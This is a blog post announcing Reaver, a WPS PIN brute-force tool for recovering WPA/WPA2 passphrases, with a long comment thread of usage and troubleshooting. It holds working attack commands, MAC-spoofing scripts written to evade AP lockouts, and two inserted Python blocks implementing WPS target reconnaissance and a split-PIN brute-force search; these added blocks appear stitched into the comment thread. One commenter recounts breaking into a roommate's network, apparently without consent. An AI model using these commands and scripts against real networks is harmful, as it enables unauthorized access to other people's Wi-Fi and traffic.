Cracking WPA in 10 Hours or Less

The WiFi Protected Setup (WPS) protocol is vulnerable to a brute force attack that allows an attacker to recover an access point’s WPS PIN, and with it the WPA/WPA2 passphrase, in a matter of hours.

This is something that I’ve been testing and using for a while now, but Stefan over at .braindump beat me to publication. Such is life. :)

Stefan’s code isn’t quite ready for release yet, so I’ve open-sourced Reaver, my WPS attack tool. Reaver is stable and has been tested against a variety of access points and WPS implementations.

Usage is simple; just specify the target BSSID and the monitor mode interface to use:

# reaver -i mon0 -b 00:01:02:03:04:05

For those interested, there is also a commercial version available with more features and speed improvements.


184 Responses to Cracking WPA in 10 Hours or Less

  1. Pingback: Brute-forcing the PIN: is it the weak spot of the Wi-Fi protection technology WPS? | iBeini

  2. Pingback: .:[ d4 n3wS ]:. » WiFi: WPS broken!

  3. BenFromIceland says:

    Does it require a dictionary? Is it only susceptible to routers with WPS enabled? ~How long does it take to crack a 15 character password?

  4. Xavier says:

    When testing Reaver, I got this warning message: [!] WARNING: Failed to associate with aa:bb:cc:dd:ee:ff (essid:test). Is this normal?

    • Amran says:

      Never mind, it will keep giving you this type of message; just ignore it, and remember that your WiFi antenna must be near the router, because the nearer the antenna, the faster the progress will be.

  5. Pingback: Breaking WPA in 10 hours (or less) | CyberHades

  6. Humbug says:

    So I got the thing compiled, on Linux. And it looks like it isn’t merely tied to Linux (that’s what you’re using pcap for, because it provides _portable_ capturing?) but more or less tied to your computer. You really should try to compile it on a different Unix, fix all the includes Linux silently adds but other Unices don’t, heck, even run that README through a text formatter set to less than 80 characters wide, do some cross-testing and all that.

    Some sort of verbose reporting would be nice too. I just ran the thing for a night on two different wifi interfaces presumably in monitor mode (let kismet do the heavy lifting there) but all it did was say once “waiting for beacon” and sit there until eternity. Kismet sees beacons, your software doesn’t. Well, useful.

    As much as I dislike the hype around python, I think I’ll wait for Stefan’s code as it looks like having a better shot at actually working on systems not equal to the author’s.

    • Craig says:

      Could you be more specific? What in the code is specifically tied to my computer? It is plainly stated that Reaver is only supported on Linux, so building on other Unixes is not supported. But it is open source, so if you want to add support for others, feel free to submit patches on the Google Code page (which is really where these complaints should be going anyway).

      And there is a verbose option. It’s -v, as shown in the help output.

    • BB287$ says:

      Don’t use monitor mode, it isn’t needed.

  7. Lingxi says:

    Very interesting! I will pay more attention to this article and do some tests with this software. Cheers, for WPA being cracked!

  8. Lakkadshaw says:

    It’s showing [!] WARNING: Failed to associate with aa:bb:cc:dd:ee:ff
    after 5 mins on a CISCO router, which is very slow I guess; at this rate it will take more than a month to run 10^4 iterations.

  9. Craig says:

    @all:

    The failed association issues have been fixed in the latest subversion check-in.

    • Lakkadshaw says:

      Does failed association happen normally? Does it indicate an attempt?
      I’ve downloaded the latest version and tried it on a Cisco router and it’s showing “Warning failed to associate with xx:xx”, but this time it is very fast.

  10. fattymcfat says:

    Any tips for when it seems that a PIN won’t iterate? Like, it seems that after about 2% of pins are tried, it simply receives timeouts and retries the same pin over and over. I’m assuming it’s a lockout or some such, but I figure it’s reasonable to ask you about it.

    • Craig says:

      How long did it run for? If a packet gets dropped or corrupted, the AP may remain in its WPS state waiting for the next message for up to 2 minutes until it allows new WPS attempts again.

      It could be locked, but reaver usually identifies locks and warns you about them (run with -vv).

      • fattymcfat says:

        I’m running -vv, but it seems I may have been blacklisted from the AP. Reaver tried about 2% of pins before I began receiving timeouts. Now, all I get is timeouts (WARNING: Receive timeout occurred) from this particular AP. I tried giving it a few minutes to recover, but nothing changed. I changed my HW address to something different, thinking that may solve it and allow me to continue the brute force, but no beans. I can still associate with the AP, so it seems the device is up, but perhaps I’ve exhausted the PIN attempts, maybe? I’m letting it sit for about a half hour and then I’ll be trying again. I’ll let you know more specifics then.

        • markus says:

          I’m having the same issue. I tried restarting it and it just kept trying the same pin with many timeouts…. However, just as I’m typing this it’s just gone through a few more pins before getting stuck on another one. Maybe I’m just too far away.

        • xpax says:

          try
          ifconfig wlan0 down
          ifconfig mon0 down
          macchanger -r wlan0
          macchanger -r mon0
          ifconfig wlan0 up
          ifconfig mon0 up
          reaver -i mon0 -b (bssid) -c (channel) -d 3 -T .30 -vv --no-nacks
          if this doesn’t work, try again but omit the -c channel

          • xpax says:

            reaver can be funny as well… you can try one command and it won’t work, but then that very same command will start working after you try some other things… I’m guessing this has more to do with the router’s setup rather than reaver. But play with those tacks and see if you can’t get it working.

      • fattymcfat says:

        Oh, forgot to answer your question. It runs for about 15 minutes before this occurs. I’m using an Alfa 500 mW card, with mon0 (airmon-ng) as my listener device.

      • Ykwu says:

        I also encountered this issue. Reaver ran for about 19 hours (with the -vv option). At 90.90% it started to repeat the same PIN (it did that for more than 30 min). I get occasional timeouts, but they appeared from the beginning.

        • Ykwu says:

          I tried the attack again on the same TP-Link router and Reaver v1.2 again at 90.90% started to repeat a PIN (different from the previous one). I tried Reaver on two other TP-Link routers and it successfully found their WPS PINs in less than 10 hours.

          • Craig says:

            Depends on your TP-Link. I’ve found that many of the TP-Links have memory leaks that cause them to partially lock up after a certain number of attempts, this may be what has happened to you. Usually requires a reboot of the AP.

    • Chitownmafia says:

      I wrote a little script to try to curb the time reaver takes retrying duplicate pins over and over again. Although I could not totally eradicate the issue, I was able to get reaver to run a lot more smoothly; check it out:
      #!/bin/sh
      # Usage: ./restart-reaver.sh <wireless interface> <target BSSID>
      # Tears down monitor mode, randomises the MAC, brings monitor mode back up and restarts reaver.
      IFACE="$1"
      BSSID="$2"
      airmon-ng stop "$IFACE"
      sleep 2
      airmon-ng stop mon0
      sleep 2
      ifconfig "$IFACE" down
      sleep 2
      macchanger -r "$IFACE"
      sleep 2
      airmon-ng start "$IFACE"
      sleep 2
      reaver -i mon0 -b "$BSSID" -vv -a -d 4 -g 13 -r 7:30

      ###END

      Let me know how it works for you…

  11. fattymcfat says:

    Also, can’t this method be improved N-fold with multiple cards? I’d assume so. Just have 5 or 6 Alfa cards all controlled by the same app, trying various pins, etc.

    • Craig says:

      No. Multiple WPS attacks usually screw up the AP’s internal WPS state machine, and even when it doesn’t you still don’t get an N fold increase in speed because the speed bottleneck is on the AP side anyway.

      • fattymcfat says:

        So multiple different hw addresses can’t try different pins at the same time? It’s limited to one HW address at a time?

        • Craig says:

          Essentially, yes. Although some APs can handle multiple WPS registrars from different hw addresses, you still don’t see much speed improvement due to the limited resources of the AP.

          • fattymcfat says:

            Fair enough. It’ll be interesting to see how the development community approaches the optimization in exploiting this particular weakness. This seems like something that could be logarithmically shared as tasks between hw resources. Also, thanks for the hard work. Appreciate the code.

  12. cabber says:

    Tried this on a fresh Netgear router but all I seem to get is “segmentation fault” after one PIN is tried. Running it on Ubuntu 10.04, with an Alfa USB AWUS036H card. I put the card into monitor mode (mon0) and the card can be used with other Linux/Ubuntu Wi-Fi tools, so I’m assuming this is ok? The router supports WPS and it is turned on.

    Not sure what I’m doing wrong/where to go next. Could the author put up some working examples of where this has worked?

    • fattymcfat says:

      Run it in GDB and when it crashes, type “bt”. This’ll create a stacktrace that would be usable to the dev.

    • Craig says:

      This is a known issue that’s been reported on the project page. Only seems to affect some users and not others – I can’t reproduce it myself. The latest SVN code should fix the seg fault though.

      • f00bar says:

        I tried the 1.1 (subversion) and it fails to associate. Latest Debian/kernel x64 with the AWUS036H and rtl8187 driver.

        • f00bar says:

          Finally it seems to work; the problem was that the APs didn’t let me associate (auth always succeeds).

          So to check first whether association is allowed, you can run aireplay-ng with -1.

          Now the question is, why can we authenticate but not associate to an Access Point? Does it have something to do with WPS? Because in my neighborhood almost none of the APs (WPA/WPA2) let me associate… It’s like 2 out of 20.

    • Lakkadshaw says:

      Same problem here but on a Belkin router

  13. Pingback: Vulnerability in WPS, the simplified WiFi setup protocol | AllUNIX.ru, the all-Russian portal on UNIX systems

  14. Pingback: Vulnerability in WPS, the simplified WiFi authorization protocol | AllUNIX.ru, the all-Russian portal on UNIX systems

  15. Jamie says:

    All I’m getting is:
    Waiting for beacon from xx:xx:xx:xx:xx:xx
    Switching wlan0 to channel 2
    Switching wlan0 to channel 3
    Switching wlan0 to channel 4
    Switching wlan0 to channel ….

    Am I missing something?

    • f00bar says:

      Yes, you’re missing a brain.

      • Jamie says:

        Thanks for your help. Is it just that my wireless driver’s not supported? It works fine for aircracking WEP with injection.

        • Tom says:

          You can specify the channel the AP is sitting on with the -c tag.

          You can also set your mon0 to the channel the AP is on by running airmon-ng start wlan0 9…. which would set it to channel 9.

    • Craig says:

      I don’t know what card you are using, but usually when you put the card into monitor mode using airmon-ng (which is what I assume you used), it creates a second interface, usually named mon0. You have to specify mon0 as the interface to Reaver since that is the interface that is actually in monitor mode.

    • BASILHS says:

      Hello… I had the same problem, but I figured it out.
      First type in: wash -i [wireless card name] --ignore-fcs

      Then note the channel that the network is on ([CH] column),
      e.g. 6

      Then type in:
      reaver -i [wireless card name] -b [BSSID] -c [put the channel number here] -vv

      Hope I helped :)

  16. Pingback: WPS (Wireless Protected Setup) protection broken « (in) My Tech

  17. felek says:

    I have another problem: the process proceeds very slowly; after about an hour it advances 0.36%. Active, it may take ~200 hours. Does the paid version go faster?

    http://pastebin.com/yhLXDBFq

  18. Grobley says:

    Why are you publishing information which will almost certainly result in someone else suffering a loss because of it?

  19. Arnis Lapsa says:

    What are the reasons reaver cannot associate itself with the base station?

  20. felek says:

    OK, my mistake; from what I see it depends on the wifi card model.

    Please tell me what models you used; what do you recommend for best performance?

    Now I have 0.85% / 10 min on an Airlive WL-1600.

  21. Pingback: Vulnerability in WPS, the simplified WiFi authorization protocol

  22. Pingback: With The Release Of Reaver, Now Anyone Can Exploit Wi-Fi Protected Setup Flaw Freely; Reaver Releases As Open Source Software | EssayBoard

  23. ffdflk says:

    How can you scan to see if a router is using WPS?

    Also, if you crack the WPS, can this be used on WPA2 or WPA2-PSK?

    Thank you

    • Craig says:

      WPS is independent of the WPA protocol in use. So if you get the WPS pin you can recover the WPA key if you are using WPA or WPA2.

      APs broadcast support for WPS in their beacon packets. You can look for the WPS information element in wireshark.

    • jt says:

      To scan for routers using WPS, install wash and in the terminal type:

      sudo airmon-ng start wlan0
      wash -i mon0 -C -s
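    Craig’s answer above (the WPS information element in beacon frames) and jt’s wash command are the same check done two ways. As an added example that is not part of the original post, of Reaver or of wash, the following Python parses the tagged parameters of a beacon frame, finds the vendor-specific IE carrying the Wi-Fi Simple Configuration attributes (OUI 00:50:F2, type 4), and reports the fields a practitioner wants before starting an attack: WPS version, whether the AP is configured, whether AP Setup Locked is set, and the DS Parameter Set channel. The attribute IDs are the ones defined in the WSC specification; the beacon bytes are constructed inline for the demonstration, not captured traffic, and the function names are mine.

```python
"""Detect WPS in 802.11 beacon tagged parameters (added example, not wash/Reaver code)."""
import struct
from typing import Dict, Iterator, Optional, Tuple

IE_SSID = 0x00
IE_DS_PARAMETER_SET = 0x03
IE_VENDOR_SPECIFIC = 0xDD

WPS_OUI_AND_TYPE = b"\x00\x50\xf2\x04"   # Microsoft OUI, type 4 = WSC
WMM_OUI_AND_TYPE = b"\x00\x50\xf2\x02"   # same OUI, type 2 = WMM (must be skipped)

# Attribute IDs from the Wi-Fi Simple Configuration specification
ATTR_CONFIG_METHODS = 0x1008
ATTR_DEVICE_PASSWORD_ID = 0x1012
ATTR_SELECTED_REGISTRAR = 0x1041
ATTR_WPS_STATE = 0x1044
ATTR_AP_SETUP_LOCKED = 0x1057
ATTR_VERSION = 0x104A


def iter_ies(tagged: bytes) -> Iterator[Tuple[int, bytes]]:
    """Walk the (id, length, value) information elements; refuse truncated ones."""
    off = 0
    while off + 2 <= len(tagged):
        ie_id, ie_len = tagged[off], tagged[off + 1]
        body = tagged[off + 2: off + 2 + ie_len]
        if len(body) != ie_len:
            raise ValueError("truncated information element")
        yield ie_id, body
        off += 2 + ie_len


def parse_wsc_attrs(payload: bytes) -> Dict[int, bytes]:
    """WSC attributes are big-endian TLVs: 2-byte id, 2-byte length, value."""
    attrs: Dict[int, bytes] = {}
    off = 0
    while off < len(payload):
        if off + 4 > len(payload):
            raise ValueError("truncated WSC attribute header")
        attr_id, attr_len = struct.unpack_from(">HH", payload, off)
        off += 4
        value = payload[off: off + attr_len]
        if len(value) != attr_len:
            raise ValueError("truncated WSC attribute value")
        attrs[attr_id] = value
        off += attr_len
    return attrs


def wps_info(tagged: bytes) -> Optional[dict]:
    """Return the WPS facts from a beacon's tagged parameters, or None if no WSC IE."""
    channel = None
    wsc = None
    for ie_id, body in iter_ies(tagged):
        if ie_id == IE_DS_PARAMETER_SET and len(body) == 1:
            channel = body[0]
        elif ie_id == IE_VENDOR_SPECIFIC and body.startswith(WPS_OUI_AND_TYPE):
            wsc = parse_wsc_attrs(body[4:])
    if wsc is None:
        return None
    version = wsc.get(ATTR_VERSION, b"\x10")[0]
    return {
        "channel": channel,
        "version": f"{version >> 4}.{version & 0x0F}",
        "configured": wsc.get(ATTR_WPS_STATE, b"\x00")[0] == 0x02,
        "locked": wsc.get(ATTR_AP_SETUP_LOCKED, b"\x00")[0] == 0x01,
        "selected_registrar": wsc.get(ATTR_SELECTED_REGISTRAR, b"\x00")[0] == 0x01,
        "config_methods": int.from_bytes(wsc.get(ATTR_CONFIG_METHODS, b"\x00\x00"), "big"),
    }


def _ie(ie_id: int, body: bytes) -> bytes:
    return bytes([ie_id, len(body)]) + body


def _attr(attr_id: int, value: bytes) -> bytes:
    return struct.pack(">HH", attr_id, len(value)) + value


# Constructed sample beacons (not captured traffic).
WSC_ATTRS = (
    _attr(ATTR_VERSION, b"\x10")               # WPS 1.0
    + _attr(ATTR_WPS_STATE, b"\x02")           # configured
    + _attr(ATTR_AP_SETUP_LOCKED, b"\x01")     # PIN method locked: wash flags this
    + _attr(ATTR_SELECTED_REGISTRAR, b"\x00")
    + _attr(ATTR_DEVICE_PASSWORD_ID, b"\x00\x00")
    + _attr(ATTR_CONFIG_METHODS, b"\x01\x88")  # Keypad | PushButton | Display
)
BEACON_WITH_WPS = (
    _ie(IE_SSID, b"test")
    + _ie(IE_DS_PARAMETER_SET, b"\x06")
    + _ie(IE_VENDOR_SPECIFIC, WMM_OUI_AND_TYPE + b"\x01\x01\x80\x00")
    + _ie(IE_VENDOR_SPECIFIC, WPS_OUI_AND_TYPE + WSC_ATTRS)
)
BEACON_WITHOUT_WPS = _ie(IE_SSID, b"test") + _ie(IE_DS_PARAMETER_SET, b"\x06")

if __name__ == "__main__":
    print(wps_info(BEACON_WITH_WPS))
    print(wps_info(BEACON_WITHOUT_WPS))
```

    The OUI check alone is not enough: WMM and other Microsoft-OUI elements share 00:50:F2, so the type byte must be matched too. The locked flag is the one to check before launching: an AP advertising AP Setup Locked rejects every PIN until it resets, which is the behaviour several commenters in this thread describe as endless timeouts.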

  24. Pingback: Researchers demonstrate flaw in WPS wireless network security | Agência pre7

  25. Pingback: Your WiFi is (Possibly) No Longer Secure! - Forbes

  26. Pingback: WPS design flaw makes WLAN routers attackable | Der News Blog von Steve

  27. TwitterBoy says:

    Hi Craig,

    Thanks for your tool. I used it but I have this problem; any idea?
    Perhaps the router is not vulnerable??

    reaver -i mon0 -b 5C:33:8E:XX:XX:XX -vv

    Reaver v1.2 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

    [+] Waiting for beacon from 5C:33:8E:XX:XX:XX
    [+] Switching mon0 to channel 2
    [+] Switching mon0 to channel 3
    [+] Switching mon0 to channel 4
    [+] Switching mon0 to channel 5
    [+] Switching mon0 to channel 6
    [+] Switching mon0 to channel 6
    [+] Associated with 5C:33:8E:XX:XX:XX (ESSID: Orange-xxxx)
    [+] Trying pin 31716925
    [+] Trying pin 54326927
    [!] WARNING: Failed to associate with 5C:33:8E:XX:XX:XX (ESSID: Orange-xxxx)
    [+] Switching mon0 to channel 7
    [!] WARNING: Failed to associate with 5C:33:8E:XX:XX:XX (ESSID: Orange-xxxx)
    [+] Switching mon0 to channel 8

    • Craig says:

      Considering you had at least one pin that got a response I’d say the AP is vulnerable. The problem is you are having trouble associating with it, which is usually an indication of poor signal strength or a lot of interference.

      • TwitterBoy says:

        Thanks for the response Craig,

        But in this case I don’t think so, because the router is very near me; the signal strength is > 95%.

        I used for the test Backtrack 4 r2 and only installed your tool, version 1.2. Any other idea?

        Thanks a lot, Craig.

        • TwitterBoy says:

          Hi Craig,

          I followed your recommendation; I put my wifi card nearer to the AP. Now I have this problem:

          root@bt:~/reaver-1.2/src# reaver -i mon0 -b 5C:33:8E:XX:XX:XX -vv

          Reaver v1.2 WiFi Protected Setup Attack Tool
          Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

          [+] Waiting for beacon from 5C:33:8E:XX:XX:XX
          [+] Switching mon0 to channel 6
          [+] Associated with 5C:33:8E:XX:XX:XX (ESSID: Orange-xxxx)
          [+] Trying pin 86481762
          [!] WARNING: Receive timeout occurred
          [!] WARNING: Receive timeout occurred
          [!] WARNING: Receive timeout occurred
          [!] WARNING: Receive timeout occurred
          [!] WARNING: Receive timeout occurred
          [!] WARNING: Receive timeout occurred
          [!] WARNING: Receive timeout occurred
          …….

          My chipset is Ralink RT2870/3070 and the driver is rt2800usb.

          Any idea? Do you think the AP is vulnerable?

          Thanks…

          Happy New Year Craig !!

          • RussianBear says:

            Same thing – I’ve tried different SSIDs but same result, and reaver goes on cracking the same PIN again and again. What’s the reason?

            I use the same chipset RT2870, adapter TL 7200ND

          • lys says:

            Ralink RT2870/3070 is not supported

    • BASILHS says:

      Hello… I had the same problem, but I figured it out.
      First type in: wash -i [wireless card name] --ignore-fcs

      Then note the channel that the network is on ([CH] column)

      Then type in:
      reaver -i [wireless card name] -b [BSSID] -c [put the channel number here] -vv

      Hope I helped :)

    • ampk says:

      Use -c ## and specify the correct AP channel.

  28. Pingback: Researchers demonstrate flaw in WPS wireless network security |

  29. Pingback: Researchers demonstrate flaw in WPS wireless network security

  30. Beini says:

    Same AP, same PSK, Different results. Please see your twitter. Thanks!

  31. deviant says:

    Fantastic project, man! Tested on my AP at home and was humbled, to say the least.
    Had to do a couple of patches to the drivers as the association with the AP kept failing. On closer inspection, I noticed that mon0 was pinned to fixed channel -1 when using aireplay to get the association. The fix can be found on the aircrack site if any other users experience the same problem. Once that was sorted I let it run, and four hours later there was my epic PSK in plain text :O

  32. ProjectX says:

    Thanks for the release of Reaver, it’s really a good tool and I was able to set it up fine in my BackTrack.

  33. Billy says:

    Hi, great tool thanks.

    I have two talktalk APs, it worked very well with one but with the other it instantly returns the incorrect pin, I think rtstanif in issue 16 is also seeing the same thing: http://code.google.com/p/reaver-wps/issues/detail?id=16 … thought I’d let you know.

  34. SIFE says:

    Is there any way to check whether a router’s PIN feature is enabled or not?

  35. Pingback: Researchers demonstrate flaw in WPS wireless network security « Canal Engenharia RMC

  36. Seb says:

    Very nice tool! Some routers actually expose their PIN number in their factory set SSID. For instance, one Sitecom router here has six hex digits in its SSID. After converting those to seven decimal digits and modifying reaver1.2 a little bit, the PSK was recovered in just a few seconds.

  37. Pingback: Not all routers susceptible to the WPS hole | Tuxxnet.de - With security, one step ahead!

  38. sock says:

    This tool is exceptional, and I hope they are working it into BackTrack 6….. It took all of 7 hours, but eventually I got into my neighbor’s wifi (w/ permission). . . it DOES crack the WPA PSK…. It returns it to you as a non-hexadecimal key……. No more deauthing…. handshakes, etc. HA

    Only prob tho…… the AP would ban my MAC for exactly 5 mins every so often…. so if this tool could be made to spoof your MAC every 3-4 mins to keep the router from banning, that could decrease the time.

    • Craig says:

      Glad to hear it’s working well. :)

      Unfortunately the lock outs are not usually done on a per-MAC basis, they just lock everyone out for a pre-defined period of time. So changing MACs won’t help (at least this is how all the implementations that I’ve seen work).

  39. markus says:

    I have a (hopefully not stupid) question. In Stefan Viehböck’s white paper on this, it says this:
    “An attacker can derive information about the correctness of parts of the PIN from the AP’s responses. If the attacker receives an EAP-NACK message after sending M4, he knows that the 1st half of the PIN was incorrect. If the attacker receives an EAP-NACK message after sending M6, he knows that the 2nd half
    of the PIN was incorrect.
    This form of authentication dramatically decreases the maximum possible authentication attempts needed from 10^8 (=100,000,000) to 10^4 + 10^4 (=20,000). As the 8th digit of the PIN is always a checksum of digit one to digit seven, there are at most 10^4 + 10^3 (=11,000) attempts needed to find the correct PIN.”
    I’ve noticed, using Reaver, that in the PIN attempts the second half of the PIN is reused quite frequently, sometimes 3 times out of 5 in a row. Is this because the second half of the PIN cannot be tested until the 1st half has been successfully identified? After re-reading the paper I think this is the case, but I was hoping for confirmation.

    • Craig says:

      That is correct. Basically, you only have a 7 digit pin since the last digit is a checksum, so the first three digits of the second half of the pin will always be the same in Reaver until the first half of the pin is cracked.

      So you’ll see something like:

      12345670
      43215674
      98705672

      Where the first four digits are the first half of the pin being brute forced, the next 3 digits are the second “half” of the pin which doesn’t change (until the first half is broken), and the last digit is a check sum.
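      The split-half search described in the quoted paper and in Craig’s reply, as an added example that is not part of the original post or of Reaver’s code. The AP is a constructed Python stand-in for the registrar: it answers EAP-NACK after M4 when the first half is wrong and after M6 when the second half is wrong, which is all the search needs to learn from. The check-digit routine is the Luhn-style computation the WPS specification defines for the 8th digit; the fixed placeholder second half “567” is chosen only to reproduce the PIN sequence shown above, and the class and function names are mine.

```python
"""Simulation of the WPS split-PIN brute force (added example, not Reaver code)."""


def wps_checksum(first7: int) -> int:
    """WPS check digit for the first seven PIN digits (Luhn-style, per the WPS spec)."""
    accum = 0
    n = first7
    while n:
        accum += 3 * (n % 10)
        n //= 10
        accum += n % 10
        n //= 10
    return (10 - accum % 10) % 10


def make_pin(first7: str) -> str:
    """Append the check digit to a seven-digit string, e.g. '1234567' -> '12345670'."""
    return first7 + str(wps_checksum(int(first7)))


class SimulatedAP:
    """Constructed stand-in for an AP's WPS registrar.

    A real AP leaks the same two facts over the air: an EAP-NACK after M4 means
    the first four digits were wrong, an EAP-NACK after M6 means the last four
    were wrong. Rate limiting and lockouts (discussed in the thread) are not modelled.
    """

    def __init__(self, pin: str):
        if len(pin) != 8 or not pin.isdigit():
            raise ValueError("WPS PIN must be 8 digits")
        self.pin = pin
        self.attempts = 0

    def try_pin(self, pin: str) -> str:
        self.attempts += 1
        if pin[:4] != self.pin[:4]:
            return "M4-NACK"
        if pin[4:] != self.pin[4:]:
            return "M6-NACK"
        return "M7"  # registrar proceeds; the credentials follow


def crack_pin(ap: SimulatedAP) -> str:
    """Recover the PIN in at most 10^4 + 10^3 attempts when the 8th digit is a checksum."""
    # Phase 1: brute force the first half. The second half is a fixed placeholder
    # ('567' plus its check digit), which is why the tail repeats in Reaver's output.
    first_half = None
    for p1 in range(10_000):
        pin = make_pin(f"{p1:04d}567")
        response = ap.try_pin(pin)
        if response == "M7":
            return pin            # the placeholder happened to be right
        if response == "M6-NACK":
            first_half = pin[:4]  # M4 was accepted: first half confirmed
            break
    if first_half is None:
        raise RuntimeError("no first half accepted; AP is not answering as expected")

    # Phase 2: only 10^3 candidates remain, because the last digit is derived.
    for p2 in range(1_000):
        pin = make_pin(f"{first_half}{p2:03d}")
        if ap.try_pin(pin) == "M7":
            return pin
    # Some APs do not use a check digit; a full 10^4 second-half search is needed then.
    raise RuntimeError("second half not found; AP may not use a checksummed PIN")


if __name__ == "__main__":
    ap = SimulatedAP("99999995")  # worst case for this search order
    print(crack_pin(ap), ap.attempts)  # 99999995 11000
```

      The worst case is 10,000 attempts for the first half plus 1,000 for the second, the 11,000 figure quoted from the paper above; at the seconds-per-attempt rates reported in this thread that is where the “hours” come from. The simulated AP never locks out, so it shows the search order, not the timing.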

  40. hash says:

    No problems. I’m running in -vv mode and it’s not showing me the pins it is trying, only 2.50% complete @ 131 seconds/attempt, then 2.51%, etc., but like I said, just not showing the pins it is trying to use. And what does seconds/attempt mean? Thanks. I’m having lots of fun testing this tool!

  41. GGG says:

    Mine gets stuck at a number like 1.3%, over and over again and again.

    Backtrack in VMware and an Alfa 036H; does someone know the problem?

  42. GeeMann says:

    If the first half of the PIN is known (i.e. 1723), can this be used with the -p switch?

    ex: reaver -i mon0 -b BSSID -p 1723 -vv

    • Craig says:

      Yes, if you specify only the first four digits, Reaver will use those and begin brute forcing the last four digits. You may need to use the code from the SVN repository though, IIRC 1.3 has a bug in it when only specifying a 4 digit pin.

  43. Pingback: WPS vulnerability – case study « Tecnologia Segura

  44. Emerson says:

    Hello, I read all the posts and even saw one similar to what I’m going to ask, but I still don’t know what to do. Using it on BackTrack 5, running with -vv, it returns the message: ! warning: failed to associate with. What should I do? Is the problem mine or the program’s?

  45. beupinyamom says:

    STILL gives “[!] WARNING: Receive timeout occurred” IF it actually makes the association. This is nothing more than buggy POC code. You should have waited and released working code, because this has had 3 releases and still does not work.

    • Craig says:

      You can always contribute back to this open source project that you paid nothing for by troubleshooting your problems, properly submitting your issues on the Google code project page, and submitting patches back to the project.

    • ex1le says:

      Ignore the above troll, nice work on the code to date

  46. Pingback: Brute-forcing the PIN: is it the weak spot of the Wi-Fi protection technology WPS?

  47. Emerson says:

    Does it work with an 802.11g USB Ralink antenna? I’m having no success; it gives an association error. Thank you!

  48. apple314 says:

    This goes out to all of you who are bitching!
    You are pissing on a guy who put his time and effort into developing something
    that is free! If you want to learn and develop your own tools, start by improving the code for Reaver; you’ll see you learn a lot, and you step away from the script-kiddie mentality. Keep learning; you’ll die a fool, but a little less of a fool than most…

  49. gpuhash.com says:

    Yes, Reaver is an excellent tool, but we can’t find many APs vulnerable to the WPS attack. So the traditional wordlist attack is still useful.

  50. ex1le says:

    Agree with the above – maybe 20% of APs tested so far have been vulnerable, but it definitely speeds matters up when they are >> Just cracked a 26 character PSK in under 7 hrs.

    Great work on this

  51. insomniac says:

    I have a question about walsh/wash: after probing about 30 APs with WPA/WPA2 enabled, I found that none of them has WPS. My router has WPS, but no configuration at all in the panel (it’s ISP-provided), and I am sure only about the button-enabled WPS, unsure about external registrar. By the way, I’m pretty sure that two routers in my range support it. They also respond to reaver’s attempts, but they don’t show up in wash’s output. What may be happening? Am I doing something wrong? My card’s drivers are patched for injection and I use it seamlessly for other WiFi tests.

  52. Mazen says:

    After searching around, a question came to my mind.

    Do I need to generate a rainbow table in order to successfully launch the reaver attack?

    If yes, how can I do that?

    Thanks

  53. Pingback: Behind The Hacker News (thehackernews.com) | ProjectX Blog – Information Security Redefined

  54. Boris the Blade says:

    Yesssss! You are the man!!! Very impressed and have a massive smile on my face ;)

  55. Carfax says:

    All I see is
    [+] Waiting for beacon from 06:1C:DF:04:A7:86
    [+] Associated with 06:1C:DF:04:A7:86 (ESSID: WiFi – 2012)

    and then it sits there for an eternity. Is there anything I’m doing wrong?

  56. Jack Cade says:

    You can save yourself a lot of time by ascertaining which APs are vulnerable to this attack:

    the command ‘ wash -i mon0 ‘ will list all the APs in range that are using WPS.

    I’ve had the best results with the following command (and I tried a lot of variations):

    reaver -i mon0 -b XXXXXXXXXX -c1 -d 0 (where -c1 is the channel and -d 0 is no delay between PIN attempts).

    reaver works like a charm for me; average cracking of WPA is 2 to 3 hours. Thank God, goodbye to wordlists.

    • JT says:

      Just like you said, “works like a charm” if you know it’s working.

      I would recommend anyone new to the program to use the original code to start, possibly adding -vv, just to see how it is working and read any possible errors. Once figured out, this is the code to use.

  57. Chitownmafia says:

    So for all you people out there who are still having issues with repeating pins and AP lock-up, check out this script; you will have to loop it in order for it to crack the AP properly. The script is as follows, not looped:

    #!/bin/sh
    # Usage: ./reaver-cycle.sh <wireless interface> <target BSSID>
    IFACE="$1"
    BSSID="$2"
    airmon-ng stop "$IFACE"
    sleep 5
    airmon-ng stop mon0
    sleep 5
    ifconfig "$IFACE" down
    sleep 5
    macchanger -r "$IFACE"
    sleep 5
    airmon-ng start "$IFACE"
    sleep 5
    reaver -i mon0 -b "$BSSID" -a -vv -d 4 -g 15 -r 7:30 -T 0.5

  58. ali says:

    In the configure script there is a check for libpcap. It fails when you don’t have sqlite3-dev installed, with a message that libpcap is not installed. I think this should be fixed to show a message about sqlite3, because it’s confusing now (I had to modify the configure script to display the test err file to find out why this test failed).

  59. Chitownmafia says:

    I run BackTrack off of USB; all of the lib drivers are already installed, no installing stuff, it’s all set up for you…

  60. Felix Lustercluck says:

    Reaver/walsh works great on Sabayon Linux with a Realtek-chipset card I bought for about $13.

    My roommate was bitching about high Internet bills and blamed me for the bills.

    I have a wired connection and I *do* use Torrents a fair bit. My roommate uses a wireless connection (despite being less than 20 feet from the router, as the crow flies) and insisted I was the cause of the high bill, but I know damned well I wasn’t responsible. We have another roommate who watches YouTube *endlessly*, but I got the blame.

    “And, you have an unnecessary wireless network, in a household where not one of us uses wireless devices.”

    “Dude, nobody can hack it because I have a very long and complicated password! I used a car’s VIN number!”

    Yeah, well, his Pontiac’s VIN, read through the windshield, wasn’t it.

    Reaver did it. “987654321abc” was his super-complicated password. Jesus, a password guessing program might have done it.

    Reaver cracked it in about 4 hours.

    Thank you. He no longer bitches at me. Even admitted that I know more about computers than he does (my degree in Electrical Engineering from a Canadian University kind of trumps his time spent at the counter of a car-rental company, I would have thought…)

  61. Pingback: WiFi: how to perform a hack | MyRXUS

  62. Tjorriemorrie says:

    I still get:
    [!] WARNING: Failed to associate with …

    Running v1.4

    How do I fix this?

  63. hobin rood says:

    I just keep getting 12345670, sending, rec 0.0% a few times, then time out, retrying last pin 12345670 again and again. I’m using a Belkin dongle I got with my router; always 0.0%.

  64. hobin rood says:

    Hi, I have placed the dongle on top of the router, I am getting 85% signal, and these are the results:

    [+] switching mon0 to channel 11
    [+] waiting for beacon from xx:xx:XX:xx:xx:xx
    [+] associated with xx:xx:xx:xx:xx:xx (essid: virginmediaxxxxxxx)
    [+] trying pin 12345670
    [+] sending EAPOL START request
    [+] sending identity request
    [+] sending identity response
    [+] warning: receive timeout occurred
    [+] trying pin 12345670

    it does this a few times then says
    [+] sending EAPOL START request
    [+] sending identity request
    [+] sending identity response
